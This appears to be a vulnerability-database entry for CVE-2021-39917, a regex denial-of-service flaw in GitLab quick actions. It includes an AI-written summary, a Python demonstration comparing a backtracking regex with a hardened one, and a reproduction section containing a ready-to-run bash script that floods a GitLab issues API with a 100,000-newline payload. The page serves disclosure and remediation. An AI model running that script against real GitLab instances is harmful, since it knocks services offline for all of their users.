CVE-2021-39917
Description
An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.9 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2. A regular expression related to quick actions features was susceptible to catastrophic backtracking that could cause a DOS attack.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
GitLab CE/EE versions 12.9 through 14.5.1 contain a ReDoS vulnerability in quick actions extraction, allowing unauthenticated denial-of-service via crafted inline code.
Vulnerability
The GitLab quick actions feature uses a regular expression INLINE_CODE_REGEX in lib/gitlab/quick_actions/extractor.rb to exclude inline code blocks from being parsed as quick commands [1]. This regex has cubic time complexity due to nested quantifiers, enabling catastrophic backtracking. All versions from 12.9 before 14.3.6, 14.4 before 14.4.4, and 14.5 before 14.5.2 are affected [1].
Exploitation
An attacker with the ability to create or edit issues, merge requests, or comments (including unauthenticated users if public projects exist) can send a crafted payload: a backtick followed by approximately 100,000 newlines and a single character (e.g. ``"`"+"\n"*100000+"x"``) [1]. By submitting 50 such issues via the API, the attacker triggers catastrophic backtracking, consuming CPU on the GitLab server [1]. The vulnerability is reachable through the issue creation API endpoint [1].
Impact
Successful exploitation causes a denial-of-service (DoS) condition [1]. The GitLab application becomes unresponsive while processing the malicious input due to CPU exhaustion, affecting all users of the instance [1].
Mitigation
GitLab released fixed versions: 14.3.6, 14.4.4, and 14.5.2 [1]. Users should upgrade immediately. No workaround is available; disabling the quick actions feature is not configurable [1]. This CVE is not currently listed in CISA's Known Exploited Vulnerabilities catalog.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: >=12.9 <14.3.6, >=14.4 <14.4.4, >=14.5 <14.5.2
- Range: >=12.9, <14.3.6
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"The `INLINE_CODE_REGEX` pattern uses nested quantifiers (`\n* .+? \n*`) that cause cubic catastrophic backtracking when processing a backtick followed by many newlines."
Attack vector
An attacker with an API token and the ability to create issues on at least one project sends a crafted payload — a backtick followed by many newlines and a single character (e.g. ``"`"+"\n"*100000+"x"``) — as the issue description. The `INLINE_CODE_REGEX` has cubic complexity, so processing this input causes catastrophic backtracking that consumes excessive CPU, rendering the GitLab instance unresponsive [ref_id=1].
Affected code
The vulnerable regex is defined in `lib/gitlab/quick_actions/extractor.rb` as `INLINE_CODE_REGEX`, which matches inline code blocks spanning multiple lines. This regex is combined into `EXCLUSION_REGEX` and matched against the body of issues, comments, and other markdown content to exclude certain elements from quick-action processing [ref_id=1].
What the fix does
The advisory does not include a published patch diff, but the fix would need to rewrite `INLINE_CODE_REGEX` to avoid nested quantifiers that cause cubic backtracking. The remediation guidance is implicit in the issue report: the regex pattern `` `\n* .+? \n*` `` should be replaced with a non-backtracking or atomic equivalent to eliminate catastrophic backtracking when processing pathological inputs [ref_id=1].
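The following is an added illustration, not GitLab's own code: it models the regex shape quoted above (backtick, `\n*`, a lazy `.+?`, `\n*`, backtick, with dot matching newline) beside a hardened equivalent whose body is a character class that excludes the closing delimiter, and wraps both in a small quick-action extractor of the kind the advisory describes. The quick-action syntax (`/command` at the start of a line), the helper names, and the payload builder are assumptions for the example; the actual `INLINE_CODE_REGEX` and `EXCLUSION_REGEX` in `lib/gitlab/quick_actions/extractor.rb` are not reproduced here.

```python
import re
import time

# Illustrative reconstruction of the pattern shape quoted in the advisory.
# NOT GitLab's code. `\n*` and `.+?` both accept newlines, so the engine has
# many ways to split a run of newlines between them; when no closing backtick
# exists, every split is tried (outer \n* x lazy .+? x inner \n* -> cubic).
BACKTRACKING_INLINE_CODE = re.compile(r"`\n*.+?\n*`", re.DOTALL)

# Hardened form: the body is a class that excludes the delimiter, so there is
# only one way to extend the span and the scan is linear in the input length.
SAFE_INLINE_CODE = re.compile(r"`[^`]+`")

# Assumed quick-action syntax for this example: a slash command at line start.
QUICK_ACTION = re.compile(r"^/(\w+)", re.MULTILINE)


def strip_inline_code(text, pattern=SAFE_INLINE_CODE):
    """Blank out inline code spans so their contents are never parsed as commands."""
    return pattern.sub(" ", text)


def find_quick_actions(text, pattern=SAFE_INLINE_CODE):
    """Names of quick actions that appear outside inline code spans."""
    return QUICK_ACTION.findall(strip_inline_code(text, pattern))


def pathological_input(n):
    """Constructed payload shape from the report: backtick, n newlines, one char."""
    return "`" + "\n" * n + "x"


def time_search(pattern, text):
    """Seconds spent by a single pattern.search over text (demonstration only)."""
    start = time.perf_counter()
    pattern.search(text)
    return time.perf_counter() - start


if __name__ == "__main__":
    # Both patterns agree on ordinary markdown: the /close inside the code span
    # is ignored, the /shrug outside it is found.
    sample = "/shrug\n`\n/close\n`"
    print(find_quick_actions(sample))                              # ['shrug']
    print(find_quick_actions(sample, BACKTRACKING_INLINE_CODE))    # ['shrug']

    # Growth of the backtracking pattern on the unterminated payload. Kept to a
    # few hundred newlines so this finishes; the report used 100,000.
    for n in (100, 200, 300):
        print(f"backtracking n={n}: {time_search(BACKTRACKING_INLINE_CODE, pathological_input(n)):.3f}s")

    # The hardened pattern handles the full-size payload immediately.
    big = pathological_input(100_000)
    print(f"hardened n=100000: {time_search(SAFE_INLINE_CODE, big):.6f}s")
```

The two patterns return the same spans for well-formed markdown (a backtick, at least one character, a backtick), but only the hardened one has a bounded worst case: on an unterminated span it scans to the next backtick once and gives up, whereas the quoted shape re-tries every partition of the newline run. Possessive quantifiers or atomic groups are the other standard way to remove the ambiguity where the regex engine supports them.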
Preconditions
- auth: Attacker must have a valid API token for the GitLab instance
- input: Attacker must be able to create issues on at least one project
- config: The GitLab instance must be running an affected version (12.9 through 14.5.1)
Reproduction
1. Obtain a GitLab API token and a project ID where you can create issues.
2. Run the following bash script (adjust `GITLAB_HOST`, `PROJECT_ID`, and `AUTH_TOKEN`):

```bash
PROTO=https
GITLAB_HOST=your-gitlab-instance
PROJECT_ID=xxxxxx
AUTH_TOKEN=xxxxxx
PAYLOAD=$(ruby -e'print "`"+"\n"*100000+"x"')
for i in {1..50}; do
  curl -X POST \
    "${PROTO}://${GITLAB_HOST}/api/v4/projects/${PROJECT_ID}/issues" \
    -H "Private-Token: ${AUTH_TOKEN}" \
    --data "title=issue_${RANDOM}_${RANDOM}" \
    --data "description=${PAYLOAD}" &
done
```

3. The GitLab instance becomes unresponsive due to CPU exhaustion [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-39917.json (MITRE refsource: CONFIRM)
- gitlab.com/gitlab-org/gitlab/-/issues/338486 (MITRE refsource: MISC)
- hackerone.com/reports/1277918 (MITRE refsource: MISC)
News mentions
No linked articles in our index yet.